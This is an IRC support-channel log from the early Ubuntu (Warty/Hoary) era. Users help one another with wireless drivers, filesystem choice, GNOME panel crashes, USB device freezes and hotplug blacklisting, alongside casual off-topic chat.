sparc64rapha: nah, i meant the ipv6 thing.09:21
raphasparc64: Hmm. Somebody else told you about that. No idea.09:22
sparc64rapha: can you give me a url for something to dl?09:22
raphasparc64: File a bug at bugzilla.ubuntulinux.org09:22
umarmungmwh_, set all panels from restart->normal, pkill gnome-panel and then start one! gnome-panel from a terminal and look for additional info/error messages09:22
raphasparc64: Out of the back of my head? Moment.09:22
raphasparc64: ftp://ftp.kernel.org/pub/linux/kernel/v2.6/linux-2.6.9.tar.bz209:22
rapha(Linux also makes you a good memory :-) )09:23
sparc64yeah, resolving takes no time at all.09:23
raphaWierd. Very wierd indeed.09:23
sparc64but after that, the paint drying world champs look appealing...09:23
sparc64 0% [                                     ]  4,344        676.74B/s ETA 14:53:1109:23
raphaNow wow, that's slow, even for kernel.org :-] 09:24
karevollhow can I make 'ls -lR' show the full path of the file on each line?09:24
raphaGive it some minutes then look at it again sparc6409:24
sparc64welcome the the Internet cira 1985 ;)09:24
sparc64rapha: ok, so i configed my inet connection using gst...09:25
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sparc64rapha: ok.09:25
raphasparc64: What's gst?09:25
mwh_umarmung: .xsession-errors gives me this (gnome-panel:5009): Gtk-WARNING **: Ignoring the separator setting09:25
epodmy wlan0 isn't picking up an ipv4 IP... can anyone help me set it up, or direct to the page for configuring ndiswrapper..? I've got it installed, and I know I've seen the page, but I can't for the life of me find it again09:25
PizbitGovernment Services Tax09:25
raphaNonphasis: what do you do for a living?09:25
Nonphasisrapha, hack c++09:26
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Nonphasisrapha, mobile phone stuff, more specifically09:26
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raphaNonphasis: cool. Nokia?09:26
drakonimepod, http://ndiswrapper.sourceforge.net/09:26
sparc64rapha: lemme try using wvdial... brb...09:26
Nonphasisrapha, almost. a subcontractor09:26
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raphasparc64: good luck09:26
mwh_umarmung: I just cleared that file and now it seems that no error is generated there .. the panel crashes horibly though09:26
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epoddrakonim, no, I have it installed.  I need to configure it, there is a wiki page on it, and I can't find it again.09:26
=== DAC1138 [~dave@24-56-174-97.co.warpdriveonline.com] has joined #ubuntu
drakonimepod, ahh...  what kind of NIC is it?09:27
Nonphasisrapha, N phones, mostly. The new communicator and the PDA on slashdot frontpage has lots of my code :)09:27
DAC1138holy cow, more users here than in #suse09:27
raphaNonphasis: Hmm. So you wouldn't be in a position to modify Nokia cellphones calendars to let you enter an event that is scheduled for a set of specified days every week, like "Mo-Fr, But not Sa/Su"?09:27
drakonimDAC1138, isnt it beutiful? ::sniff::09:27
raphaNonphasis: PDA? Like, PDA with phone included?09:28
DAC1138drakonim, i'd like to try ubuntu, but suse is working fine.09:28
Aardthere's #suse out there? is it an alternate channel to #bdsm?09:28
Mithrandireller m jeg bygge en?09:28
Nonphasisrapha, http://slashdot.org/article.pl?sid=04/11/03/1257220&tid=215&tid=137&tid=100&tid=109:28
epoddrakonim, broadcom 802.11g, I have wlan0, it comes up and all, but I can't make it get an ip from my DHCP server09:28
drakonimDAC1138, big fan of the if it aint broke, dont fix it.09:28
DAC1138man, i wish i wouldve found ubuntu easlier09:28
j^DAC1138 use the livecd09:28
will_when i started coming in here, there was about 150 ppl on average!09:28
drakonimepod, what is your ssid?09:28
=== rapha checks that out
epoddrakonim, essid? 'cservice'09:29
DAC1138drakonim, yeah. especially since i use a commercial X server that give me hell to install on debian systems (it doesnt work on any debian distro ive tried)09:29
enablanyone know when 2.6.9 kernel will make it into the hoary repsitories09:29
Nonphasisrapha, I might be, I'll make a note - at least I occasionally sit at tables where such suggestions might be heard09:29
drakonimepod, yeah.. missed a key sorry... and does it show that in iwconfig?09:29
mwh_why does gnome-panel behave like this sigh09:29
nateawhich file system is best? ext3, reiserfs, ufs ?09:29
drakonimDAC1138, eew09:29
umarmungmwh_, can't think of anything else. You might wanna move ~/.gnome* and ~/.gconf out of the way and try again, BUT this will remove all of your customization.09:29
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DAC1138drakonim, does ubuntu support installing RPMs? and, is the placement of the X server and all its libraries and stuff the same as in redhat distros like suse and mandrake?09:30
epoddrakonim, no, I seem to have connected to the restaurant across the street's unsecured ap09:30
nateaepod, have you got a driver for the Broadcom wi-fi card?09:30
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drakonimepod, thats your problem then09:30
raphaNonphasis: it would be pretty useful: many people often have periodic apointments, but only at work. So if their mobile goes off at home, during the weekend that's very inconvenient so they won't use the mobile as an organizer at all.09:30
DAC1138drakonim, yeah. mepis was awsome also, i used it for about a week in 800x600 because of the xserver i couldnt install09:30
Cuga_natea, reiserfs is the best from that bunch, but i personally use XFS, stay away from ext309:30
rapha(myself included, naturally ;) )09:30
mwh_umarmung: ill try creating another user and then see what happens09:30
drakonimepod, iwconfig essid cservice, then dhclient wlan009:30
nateacuga_, why stay away from ext3?09:31
drakonimDAC1138, what kind of horked up video chipset you have?09:31
epoddrakonim, ok one sec09:31
mjrDAC1138, you don't really want to install proprietary driver rpms, though I've heard that people have had some success with that ;)09:31
drakonimDAC1138, and no... they are different09:31
Cuga_natea, cause its slow and basically just ext2 with a journaling hack on it09:31
drakonimDAC1138, although the answer to the rpm question is alien... but that wont really help you in this case.09:31
DAC1138mjr, the drivers i can build from source, but the server itself needs to be installed via rpm09:31
nateaso would you recommend reiser if i'm installing a new system from scratch.09:31
Nonphasisrapha, ok. If I ever got an opportunity to plug that idea, I'll credit "rapha on #ubuntu" ;-)09:31
housetiernatea, it only depends on what you need, I like ext309:31
nateawhat are the advantages of XFS?09:32
DAC1138drakonim, its a long story. ive tried for a year (literally) to get it to work09:32
housetiernatea, THATS the right question09:32
drakonimnatea, being able to brag to other geeks09:32
raphaNonphasis: cool :-)09:32
raphaNonphasis: schwarzschmid.de ;-)09:32
|Gaaruto|is there kernel-source for kernel on ubuntu ?09:32
Nonphasisnatea, reiser is supposedly more stable on linux than xfs09:32
epoddrakonim, I need to input the key for the wireless network09:32
housetiernatea, there is a site somehere on the 'net comparing the various filesystems09:32
drakonimepod, wep enabled?09:32
epoddrakonim, yes09:32
drakonimepod, not wpa... wep.09:32
Cuga_natea, you'll have to read up, each fs has their own ups and downs, but overall their are 3 standouts.. XFS, Reiser, JFS (from what i've read aswell)09:32
epoddrakonim, wep, yes09:32
Nonphasisrapha, ok. Stand by and wait for the royalty cheques ;-)09:33
drakonimepod, k havent done this with ubuntu yet.. check out the examples in 'man iwconfig'09:33
epoddrakonim, ok, thanks. :)09:33
nateacuga_, Nonphasis, are there any compatibility issues if i go with ReiserFS?09:34
drakonimepod, looks like you will need the hex value of your wep string09:34
raphaNonphasis: wasn't even my idea in the first place. Not sure where I've seen it though. Either Evolution or Outlook probably.09:34
nateai'm thinking for use with backup programs, or mounting the volumes from other OSes (such as OS X)09:34
Nonphasisrapha, incidentally, my page: http://www.students.tut.fi/~vainio24/09:34
=== drakonim uses openbsd on his wifi laptop
Nonphasisrapha, ignore the "students", I'm at school te get cheap food & net account ;-)09:35
Cuga_natea, I'm not aware of any, i've been using XFS for 3 years and never came across something it couldn't do, but i know the same from people who run reiser, they are both solid09:35
DAC1138is ubuntu fast by default? no kernel tuning required?09:35
raphaAs a matter of fact, I was just going to ask about it :)09:35
DAC1138i mean, compared to mandrake 10 and suse 9.109:35
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Nonphasisrapha, I know, it always irks poeple :)09:35
nateacuga, ok i think i'll go with ReiserFS for my / partition.09:36
sparc64_rapha: ok, using wvdial works.09:36
sparc64_rapha: most odd.09:36
sparc64_rapha: i'm gonna try investigate and file a bug.09:36
drakonimDAC1138, its quick enough for me minus alot of tuning... just get the appropriate kernel and hdparm some goodness into your disks09:36
sparc64_rapha: thanks fr the help.09:36
raphaOOOOH! PHOTOS!09:36
raphasparc64_: Well, you've helped yourself :)09:36
epodwlan0     Link encap:Ethernet  HWaddr 00:90:4B:65:3A:2D09:36
epod          inet addr:  Bcast:
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=== drakonim claps for epod
Nonphasisrapha, just one, but did an empy script for "them" anyway09:37
DAC1138drakonim, i always user hdparm. man, i better quit looking at ubuntu, i might end up wiping my disk09:37
nateahas anyone here experienced freeze-ups using the latest warty installer on PPC machines (I have a G4 17" powerbook)09:37
raphaWell, one photo. But that hat does suit you, Nonphasis09:37
Nonphasisrapha, not too much space on the account09:37
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drakonimDAC1138, lol you say that like its such a bad thing09:37
raphaNonphasis: I can only recommend Gallery (gallery.sf.net)09:37
DAC1138drakonim, does it have good hotplug support? like if i plug in my wifi card, will it configure it automatically? and same with my usb pen drive?09:37
raphaToo bad09:37
drakonimDAC1138, just really curious... what evil video chipset you have?09:38
RuffianSoldierKDE Works fine in Ubuntu!09:38
DAC1138drakonim, well, this is the first time ive actually had linux working, and i was just about to erase my windows partition and just go 100% linux, all with suse 9.109:38
nateai'm wondering if the freeze-ups have anything to do with USB or Firewire devices that I have connected.09:38
Nonphasisrapha, hahah, I put the most ridiculous photo I could find there. excessive narcissism can be one's downfall :)09:38
drakonimDAC1138, usb hotplug yes / confirmed... wifi depends on chipset, but yes its been excellent so far09:38
DAC1138drakonim, its an intel i810 855GM (82852) (mobile chipset)09:38
raphaNonphasis: http://www.all-inkl.com give you some 500MB webspace for 1 or 5 ? per month, depending on what technology (PHP, ...) you want. Not sure if they'll also work for non-Germans though.09:38
drakonimDAC1138, funy... i use an i845 and it works GREAT.09:38
DAC1138drakonim, well, the wifi card is an atmel chipset, and its been supported since kernel 2.4.2209:39
drakonimDAC1138, yeah, that'd be fine.09:39
DAC1138drakonim, yeah, like i said, its a long long story. its a gateway laptop09:39
raphaNonphasis: you should've put a flower into the hat's orange ... thing.09:39
Nonphasisrapha, lol09:39
DAC1138drakonim, hmmm........i need lots of backup space09:39
nateaare there any known issues with USB devices freezing up the system?09:39
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drakonimDAC1138, K i wont bug anymore aboot it.  your headed in the right direction making that windows partition disappear.. dont much care what distro you land with 8-)09:39
rapha"Object oriented programming (It's beautiful when you eventually "get it")." Hah! Hah! Hah! To. The. Point.09:40
nateai saw on the bugzilla that someone was having probs with his Zip drive. i also have a USB Zip drive which I unplugged, and still got the freeze-ups.09:40
rapha(I haven't...)09:40
drakonimnatea, is there anything in /var/log/messages about the freeze?09:40
DAC1138drakonim, yeah. i only need windows for adobe premiere and adobe after effects, but im playing around with cinellera for linux. until i get used to it, im running windows in vmware just for video editing only09:40
nateaactually, the Zip drive was connected via Firewire, not USB09:41
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DAC1138drakonim, yeah, i posted on a linuxquestions.org forum about the chipset problem, it ended up being like a 20 page thread with no solution09:41
nateawell, i'm reinstalling the OS right now, so I won't be able to post any msgs until I experience the freeze-up again.09:41
drakonimDAC1138, video editing in a virtual machine huh? youve either got one kick ass workstation, or alot of patients!09:41
Nonphasisrapha, OOP rocks. check out Python if you haven't yet09:41
DAC1138drakonim, a LOT of patience, lol09:41
raphaNonphasis: And VIM is superior to Emacs!09:42
Nonphasisrapha, OOP in C++ rocks less, by far09:42
nateadrakonim, what kind of messages should i be looking for?09:42
Nonphasisrapha, hah! Infidel09:42
DAC1138drakonim, im rendering this 400 fram animation. so far, ive let it run all day and all night for 2 weeks now and its only at fram 273 out of 400, talk about patience09:42
raphaNonphasis: well, I do like Mono. Python doesn't sit with me, somehow. Missing all them braces.09:42
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drakonimnatea, anything about a hotplug error or somesuch just before the machine froze09:43
DAC1138why isnt there a USA mirror to download ubuntu?09:43
drakonimnatea, also, on a fresh boot run 'dmesg' and look for errors09:43
Nonphasisrapha, try it for a day or two. Grokking the beauty of dynamic typing can be a really valuable experience09:43
raphaNonphasis: But given that Ubuntu is going to focus on Python for all their custom developments, I guess I'll have to dive in. IN VIM ;-)09:43
nateadrakonim, okay i guess i can grep for that in /var/log/messages ?09:43
drakonimDAC1138, becuase we have retarded exportation limitations09:43
rapha"Dynamic" typing? Eh?09:43
raphaNonphasis: what do they mean by that?09:43
drakonimnatea, yeah09:44
nateadrakonim, i'll also do a "dmesg" after boot to see if there are any hints.09:44
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Nonphasisrapha, a = getobject(); a.doStuff()09:44
bashI am bash09:44
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drakonimhi bash09:44
drakonimi am not bash09:44
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Nonphasis"I'm a Field Op"09:44
raphaNonphasis: A matter of preference, is it not?09:44
drakonimDAC1138, thats a splatload of patience!09:44
nateaanother this that I noticed when booting up Ubuntu, is that there was a long delay on the "Starting hotplug subsystem" step.. is this normal?09:45
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DAC1138drakonim, yeah, and im only using a laptop, 2.1 ghz, 768 mb ram09:45
Nonphasisrapha, no, it's a fundamental matter... think Smalltalk, Lisp, Python, Ruby vs. C++, Java, C#09:45
drakonimnatea, a small delay is acceptable... its assigning unique IDS to the usb/fw devices at that point i think....09:45
drakonimnatea, or at the very least probing the whole bus09:46
Nonphasisrapha, it took a while to "click" on me, having got used to static typing09:46
nateadrakonim, so if I have a lot of USB/Firewire devices, that might explain why it's taking so long?09:46
drakonimnatea, and if you have alot of devices out there... or slow ones, yes it will hang there for a little bit09:46
NonphasisLife is dynamically typed :)09:46
drakonimnatea, :-)09:46
raphaHmm. "Underlying [...]  electromagnetic vibration". Do you really think it's electromagnetic, that "stuff". What about gravity and all that may unfold should we ever solve the mysteries about gravity?09:46
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DAC1138drakonim, maybe ill just dual boot linux/linux, suse 9.1 and ubuntu09:47
nateaI have these USB devices: webcam, MIDI sound module, keyboard, mouse, Handspring cradle, Canon camera09:47
drakonimDAC1138, thats not "only" a laptop... its a pretty quick one... what sucks for virtual machining is your (probably)  5400rpm disk!09:47
nateaand a Firewire Zip drive and External Lacie HD.09:47
drakonimDAC1138, there ya go.. and have a nice little partition to cross mount to share stuff :)09:47
DAC1138drakonim, no, its only 4800RPM09:47
DAC1138drakonim, yeah, and if all goes well, i can just wipe suse 9.109:47
drakonimDAC1138, /me shudders thinking about vmware @ 4800rpm09:48
DAC1138lol. its actually pretty fast09:48
Nonphasisrapha, I was mostly concentrating on "raw matter", but I'm not sure whether gravity will be able to be non-electromagnetic09:48
DAC1138only thing is bootup and shutdowns are slow. using the virtual machine is pretty fast and responsive09:48
DAC1138drakonim, ive never dual booted linux distros before, so i dont know what im in for09:48
drakonimDAC1138, my vmware gets its own hdd (i need windows for a firewall client grrrrr) and its like having a kvm :-) that luxury is a bit easier on a full blown PC though..09:49
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nateadrakonim, i'm removing all but the kb/mouse to see if that makes a diff.09:49
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kmanyo all09:49
raphaNonphasis: My hope is that gravity at it's core is a whole new thing, totally different from everything we believe to understand so far.09:49
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drakonimnatea, your keyboard/moose usb also?09:49
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Kmananyone here has problems accessing some files on a windows partition mount?09:50
drakonimrapha, s/it\'s/its  [dont get lazy.. that wouldnt work on someones solaris box] 09:50
Kmansome gnome programs seem to have problems with handling spaces in filepaths09:50
drakonimrapha, ;-)09:50
Nonphasisrapha, ATM it seems to be a "separate" thing, but it's still a part of the same " ultimate reality". I don't think it will be fundamentally separate09:51
raphadrakonim: Well, this is a chat, interpreted by so-called "human beings". I intend to challenge them a little ;-)09:51
DAC1138drakonim, should dual booting linux distros be the same as setting up a dual boot between windows? i mean with grub installing and all09:51
=== drakonim slaps the geek out of himself
nateaanyone else here using Ubuntu Linux on a 17" Powerbook?09:51
raphaNonphasis: not separate. Just adding to the diversity (that, in the end, makes up the university).09:51
drakonimDAC1138, yeah its not that evil... makes it easier if you use some filesystem that the other distro doesnt support09:52
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Nonphasisrapha, universe, I assume ;-)09:52
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drakonimDAC1138, youve got suse?09:52
DAC1138drakonim, yeah, 9.109:52
nateaThe screen resolution doesn't seem to be configured correctly. i went to Screen Resolution prefs and it was already at the Max of 1400 x 1050,09:52
raphaNonphasis: In correct English, yes. But DIversity, UNIversity, kind of fits ;-)09:52
drakonimDAC1138, so use something super odd like xfs or jfs09:52
nateabut this leaves black edges on the left and right of the screen, and at the top and bottom the icons go off the screen.09:52
=== rapha isn't very respectful to conventions every now and then
DAC1138does ubuntu support jfs or xfs?09:53
drakonimDAC1138, xfs definately09:53
Nonphasisrapha, yes, but University -> hell of a lot of negative connotations (school, blah blah)09:53
DAC1138drakonim, i think suse 9.1 is using reiser, can i use ext3 with ubuntu?09:53
raphaNonphasis: Oh. Sorry for that ;-)09:53
drakonimDAC1138, i think jfs is in here too...hang ill check09:53
nosilver4unatea: adjust your monitor09:53
raphaAll those temptations...09:53
drakonimDAC1138, you can use anything you want....09:53
nateanosilver4u, it's an internal laptop monitor so i don't think it's possible to adjust manually.09:53
drakonimDAC1138, but usign something the other doesnt support is kinda cheating yourway into automatically hdiing the other OS09:53
nosilver4uah, weirdness then09:53
drakonimDAC1138, you just need to make sure your grub has a stage 2 for whatever filesystem you use.09:54
Kmanwhen someone opens an mp3 file on a windows parition mount, and the path to the file has spaces in it, and rythmbox/totem gives 'cannot find file' errors, is it a gnome or ubuntu problem? ('cause mandrake didn't have this, but that was an older gnome version)09:54
Nonphasisrapha, yep, conventions suck but the "language" one can be helpful. Esp. if you are drinking, which I am at the moment (impending Halloween party)09:54
DAC1138drakonim, what do you mean stage 2?09:54
nosilver4umost normally you'd want to keep the default resolution, cause laptop lcd's aren't designed to support other resolutions very well09:54
drakonimDAC1138, look in /boot/grub09:54
drakonimDAC1138, acutally... stage 1.509:54
raphaNonphasis: SKOL!09:54
=== rapha gets a bottle of water to also have something to drink
Nonphasisrapha, skol. enjoy the wasser, I've spiked my mineral vater w/ Vodka09:55
nateanosilver4u, well i haven't changed the resolution but left it at the default. it doesn't seem possible to change it to eliminate the black lines on left/right.09:55
DAC1138drakonim, i think what ill do is just try installing it via vmware, then try to install the xserver, and see if X will even start up in the vmware, rather than risking my suse 9.1 distro09:56
raphaNonphasis: so what is a good-looking, 27-year-old, successful computer programmer (and deeply spiritual being) like you sitting alone in front of a black (or grey) box on a beautieful Wednesday evening like this one?09:56
nosilver4uyou've got a laptop with default 1400x1050? that's a huge laptop09:56
drakonimDAC1138, not only will it work... but it will be accellerated X ;-)09:56
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raphanosilver4u: They're not uncommon anymore these days.09:57
nateais it advised to choose the "download updates from the internet" step when installing Ubuntu the first time?09:57
drakonimDAC1138, ubuntu comes with a nice vmware X driver09:57
drakonimnatea, yes09:57
nateai'm wondering if it's installing some bleeding edge updates that haven't fully been tested on PPC machines.09:57
DAC1138drakonim, yeah, that's what im using, the XiG accelerated x server09:57
drakonimnatea, i would advise it09:57
Cuga_drakonim, you've gotten vmware to work in ubuntu?09:57
DAC1138well, forget vmware, ill just get rid of that windows partition09:57
raphadrakonim: Do you know where that setting is stored in the later-installed system?09:57
Nonphasisrapha, actually, there was no definite plans but I felt attending a Halloween party would be fun - and the stress at work wos enough to warrant getting slightly drunk09:57
raphaDAC1138: That's the spirit! :-)09:57
drakonimCuga_ workstation 3.0.009:58
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raphaNonphasis: But sitting at a Halloween party with a computer...? :-)09:58
Cuga_drakonim, ugah lol tryed the 4.x yet?09:58
nateadrakonim, ok, i am running the mega update right now.09:58
drakonimrapha, what setting?09:58
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drakonimCuga_ nah, i have a license for 309:58
Nonphasisrapha, no, it didn't start yet. I'll hit the road in a few minutes09:58
epodwhee, I have wifi on boot up09:58
raphadrakonim: the "update from internet" setting.,09:59
drakonimCuga_ companies too cheap to buy the new one :-(09:59
epodnow... is there any sort of GUI frontend for configuring my wireless I can get? :D09:59
Cuga_drakonim, well if it does the trick09:59
ztonzyanyone knows where apache2's dir where I can put my files to show as own webserver ?09:59
Cuga_drakonim, did you have to apply any kernel patches?09:59
drakonimrapha, apt-setup09:59
epoddrakonim, thanks for the help, my system is happily online09:59
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raphaNonphasis: Oh, okay. So, you're still looking for the girl of your dreams, or is she going to go to that party with you?09:59
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raphaThanks drakonim.09:59
Nonphasisrapha, answer B09:59
drakonimCuga_, vmware patches from their support group09:59
drakonimrapha, np09:59
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drakonimepod, no problem, glad to help!09:59
raphaNonphasis: Happy to hear so!10:00
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nateai can see that Ubuntu detects my Airport card (aka Broadcom BCM94306), but doesn't configure it. are there drivers available for this card yet?10:00
epoddrakonim, do you know of any graphical frontend for configuring this stuff, so I don't need to go to terminal if I change networks?10:00
cbredesondoes anyone here have cgi working with Apache2 on Ubuntu?10:00
Nonphasisrapha, yeah, I'm not as lonely & miserable a bastard as one might be tempted to think ;-)10:00
raphaI wasn'T10:00
Nonphasisrapha, j/k10:01
raphaJust the sitting-at-the-computer at this time confused me a little ;-)10:01
Kmanhow does one install a custom .deb package?10:01
raphaWell, but then I'm sitting at a computer at this very time, too.10:01
raphaWith my Beloved some 30km's away :-/10:01
drakonimKman, dpkg -i somepackage.deb10:02
DAC1138drakonim, does ununtu have some special GUI for configuring the system? like mandrake control center or Yast or something?10:02
Kmandrakonim, thx10:02
Nonphasisrapha, well, the comp is the place to be then. Not that it weren't even w/ the beloved w/in 4m radius...10:02
nateaDAC1138, see drakonim's post 5 lines above yours.10:02
Nonphasisrapha, the nerd power has to live on, g/f or no ;-)10:02
drakonimDAC1138, there is no central kidn of thing like yast.... there all split up into gnome utilites and synaptic and such...10:02
Kmanbut they're better written than mandrake's10:03
nateaDAC1138, Computer -> System Config10:03
Kmanmandrake's custom configtools can break a slightly modified system10:03
raphaNonphasis: fool! Go and kiss her!10:03
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drakonimDAC1138, YAST is SuSE's one redeaming feature, its also its greatest weakness.10:04
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Nonphasisrapha, we'll see, it's a *public* place & all ;-)10:04
raphaNonphasis: Well, the Halloween party is, right? But not where you're now...10:05
drakonimDAC1138, make one or two modifications directly to some important start scripts or some such on your machine, and yast has a stroke..10:05
DAC1138drakonim, yeah, i was just seeing if there was something similar to yast for ubuntu, becaus mepis has one10:05
drakonimDAC1138, nah, its really not necessary with all the fun little gui's in systemconfig though.10:05
nateaepod, do you have a Broadcom BCM94306 wireless card?10:05
Kmandoes anyone here have a windows partition mounted in ubuntu?10:06
Nonphasisrapha, ah, yes - she isn't here ATM, but w/ some of her girlfriends. And even if she were, if I suddenly went out and kissed here - she would think I had been browsing pr0n, which is undesirable :)10:06
drakonimKman, not presently.. but it could be arrainged10:06
drakonimKman, what is the issue?10:06
epodnatea, it's a broadcom something10:07
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Kmandrakonim, I've got one mounted, and works pretty well.. only some gnome apps don't seem to like filepaths with spaces in them10:07
Nonphasisrapha, speaking of which, it appears I need to hit the road10:07
nateaepod, are you using a Mac?10:07
epodnatea, no, PC10:07
raphaNonphasis: Have a good evening!10:07
Nonphasisrapha, nice speaking to a comrade in spirituality10:07
drakonimKman, thats not a vfat thing... its a spaces in filenames in unix suck thing.10:07
nateaepod, what model number does Device Manager tell you?10:08
raphaHihi... typical for a "comrade in spirituality" to disconnect so fast.10:08
epodnatea, BCM9430610:08
DAC1138ok, well, while ubuntu downloads, im going to play a game. ill be back if all goes well10:08
nateaepod, that's the same one that I have.10:08
DAC1138cya guys later10:08
nateaepod, did you get it to work with Ubuntu?10:08
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epodnatea, works with bcmwl5.inf and bcmwl5.sys10:08
Kmandrakonim, k.. xmms works fine btw with all them files.. and in mandrake I didn't have any problems with the said gnomeapps ether.. so who's to blame, gnome or ubuntu10:08
epodnatea, I'm online right now with it10:09
drakonimKman, ahh... probly rhythmbox then10:09
nateaepod, are there any instructions for how to install and configure the driver?10:09
drakonimnatea, are you using a ppc (macintosh) ?10:09
nateadrakonim, yes.10:09
drakonimnatea, ndiswrapper wont help you10:09
drakonimnatea, totally different architecture10:09
nateadrakonim, darn.. too bad.10:10
raphaAnyway, I'm also going to go offline10:10
drakonimnatea, sorry.. but at least youv'e just been saved some time wasting :-P10:10
nateai heard that there is a reverse-engineering project for the Broadcom cards.10:10
raphaSee y'all later10:10
epodcan anyone help me with my Palm Pilot and USB hotsync cradle? I don't have /dev/pilot10:10
drakonimnatea, yeah, they are evil and refuse to release hardware specs.10:10
paulproteusnatea: I hear the Linux WRT54G GPLware code might be of some use.10:10
nateapaulproteus, do they have a usable driver?10:11
sjoerdpaulproteus: the broadcom driver is binary only10:11
drakonimpaulproteus, really? the driver included on the wrt's are closed.. thats interesting!10:11
paulproteussjoerd: Even in the Linksys source release?  Drat, I didn't know that.10:11
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drakonimpaulproteus, they only release the gpl stuff they touch.. they dont have to release non GPL software they use WITH their code, as a matter of fact, they would probly violate some N.D.A. with broadcom if they did.10:12
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drakonimprobly read "definately"10:13
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epodhow come totem-xine threatens to deinstall ubuntu-desktop?10:14
linux_mafiabecause ubuntu-desktop has totem-gstreamer as a depend10:15
drakonimKman, i've been having a few issues with rhythmbox myself.. it wont get my whole library sucked in for some reason... been debugging the issue in my spare time.. easy fix for you is to rename your files white spaces with underscores or something10:15
epodand I don't want to deinstall ubuntu-desktop, do I?10:16
vizvayuHi! I need some help... I managed to setup samba/winbind/pam for domain authentication. wbinfo says everything is ok (-u, -g, -t, -a) but still can't login to the system... it seems there's a problem with login restrictions, but I don't know where to look. login.defs seems ok, same as all the pam.d/ configuration files... any hint somebody??10:16
drakonimepod, would make for a very lightweight install lol10:16
linux_mafiaepod, its only a meta-package, uninstall it if you want, i did10:16
drakonimvizvayu, anything interesting logged about the failure?10:16
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epodlinux_mafia, hm, k.10:17
vizvayuups... it seems I forgot too watch the logs :)))))))) let me see...10:17
drakonimvizvayu, :-P10:17
epodCan anyone help me or direct me to where I can figure out how to set up my usb hotsync for my palm? I seem to lack a /dev/pilot device10:18
drakonimlinux_mafia, hrmph, diddnt catch that!10:18
linux_mafiaepod, if you want to watch dvds or restricted formats you *need* totem-xine, if this does not apply to you, then leave alone10:18
linux_mafiadrakonim, catch what?10:18
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epodlinux_mafia, I want to watch DVDs, yes10:18
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drakonimlinux_mafia, that it was a meta package10:18
linux_mafiadrakonim, oh, ok10:18
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drakonimdrakonim, thought it was gonna yoink all his dependencies lol10:19
linux_mafiadrakonim, talking to yourself now too, lol10:19
drakonimlinux_mafia, wouldnt be the first time LOLOL10:19
vizvayuno, there's nothing on the logs... when I try to login (using gdm) it says that the administrator has disabled my account10:21
drakonimepod, /dev/pilot should be a symbolic link to your serial device that the cradle is attatched to.10:21
epoddrakonim, mine is USB10:21
epoddrakonim, and not coming up in /dev/sd-anything10:21
drakonimepod, universal SERIAL bus.   ttyUSB010:21
epodok thanks10:22
epodI will try that10:22
drakonimkewl  make sure you have permissions to write to the device too10:22
rfetechWhat is best way to boot into run level 2 as default instead of GUI and then be able use startx for GUI?10:22
drakonimvizvayu, you have your daemons running with a debug flag?10:22
|trey|rfetech, On Debian based systems, rl 2-5 are the same... you would simple set /etc/X11/default-desktop-manager to "NONE"10:23
vizvayudrakonim, which daemon? winbind is working OK10:23
rfetechThanks trey, I'll give it a try.10:23
nateadrakonim, i had another freeze-up but this time didn't have to reboot as the system recovered.10:23
epoddrakonim, sweet, it works :)10:23
|trey|rfetech, so 'echo NONE > /etc/X11/default-desktop-manager'10:23
drakonimepod, :)10:24
nateado you want to see something interesting from the /var/log/messages ?10:24
drakonimnatea, probly one of your devices being wierd then10:24
rfetechtrey, thanks10:24
will_where is the xf86config file located? i need to change default res on boot10:24
drakonimvizvayu, no its not... you cant authenticate lol10:24
drakonimwill_, /etc/X11/XF86Config-410:24
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vizvayudrakonim, I'll try that ok :)10:24
nateadrakonim, pwc Failed to set LED on/off time.10:24
nateadrakonim, drivers/usb/input/hid-input.c: event field not found10:25
|trey|rfetech, you're welcome... also investigate rcconf for simular tasks, nice ncurses interface for editing services  :)10:25
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drakonimnatea, thats one of your kernel modules complaining about that particular devices blinky lights...10:26
[Phaedrus] hey guys10:26
=== |trey| thinks someone should think about making a GTK based frontend for rcconf :)
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|trey|[Phaedrus] , hey10:26
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nateadrakonim, could either be the webcam or the midi module, both of which have lights.10:26
blackdoghi does anyone know how to enable File Send Link on warty firefox10:26
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[Phaedrus] hey |trey|10:27
drakonimprobly the midi... its in meida10:27
nateadrakonim, can i tell Ubuntu to ignore that device so that I don't have to disconnect it everytime i boot up Linux?10:27
epodIf I install k3b, is it going to install KDE or something silly?10:27
epod*using synaptic10:27
drakonimnatea, yes hang on i need to remember how10:27
GnuHippykde is messed for me infact all KDE apps won't load and give me tons of errors10:27
drakonimnatea, it needs to get blacklisted10:28
nateaok, how does one go about blacklisting a device?10:28
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drakonimnatea, trying to remember... ubuntu doesnt use discover i dont think.... hang a minute... my paying job is looking for me LOL10:29
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|trey|natea, /etc/hotplug/blacklist10:29
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linux_mafiayay finally got bloody lm-sensors working10:30
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linux_mafia|trey|, the services module of the gnome-system-tools is in hoary now10:31
linux_mafia|trey|, not exactly the same as a gtk fe for rcconf, but its pretty good10:32
|trey|linux_mafia, I know, I just noticed that after saying about rcconf... also a Disk Management tool... not entirely sure what that is though...10:32
natea|trey|, thanks. i can see in the /var/log/messages that some device is already blacklisted: input.agent[20395] :      evbug: blacklisted input.agent[20395] :      evbug: blacklisted input.agent[20395] :      evbug: blacklisted10:32
TelepAnyone getting a "CRITICAL" error message concerning "eggdesktopentries.c" occasionally when installing some gnome packages with apt-get or Synaptic?10:33
linux_mafia|trey|, lets you turn dma on/off, format drive, change mount point, view general info about a drive10:33
|trey|natea, if you look in the /etc/hotplug/blacklist file, or /etc/hotplug/blacklist.d you would likely see all those there...10:33
ograTelep: not on warty10:33
linux_mafiaTelep, i am, but im on hoary10:34
linux_mafia|trey|, you using beagle?10:34
Telepogra: I'm running Hoary, but I had the same error on Warty the other day (I'm pretty sure, anyway :D)10:34
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|trey|Telep, I think everyone is currently, someone tried to tell me its related to mplayer...10:34
|trey|linux_mafia, nope  :(10:35
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linux_mafiaanyone using beagle? i will ask this till im blue in the face, i cant be the only one10:35
|trey|(on a side note, mplayer isn't letting me view my pr0n, this is unacceptable  ;)10:35
lupus_is there a package for beagle?10:35
natea|trey|, how do find out the name of the offending device?10:36
|trey|lupus_, see for yourself... apt-cache search beagle10:36
shaverwhois lupus_10:36
linux_mafialupus_, no, requires cvs tomfoolery, and kernel recompilation10:36
GnuHippy|trey| why wont it let you view your pr0n?10:36
lupus_and is the kernel in hoary using the inotify patch10:36
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|trey|GnuHippy, dunno... just won't run files that worked prior to the last upgrade  :(10:36
Kirsch_is it possible to have gimp be 1 window? as apposed to 1 + Amount of documents opened?10:36
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wannesKirsch: NO10:36
wannesno :)10:36
|trey|natea, I thought you would know that part  :(10:36
linux_mafialupus_, not that hard to get going though, if you can follow instructions its easy, there is a wiki page10:37
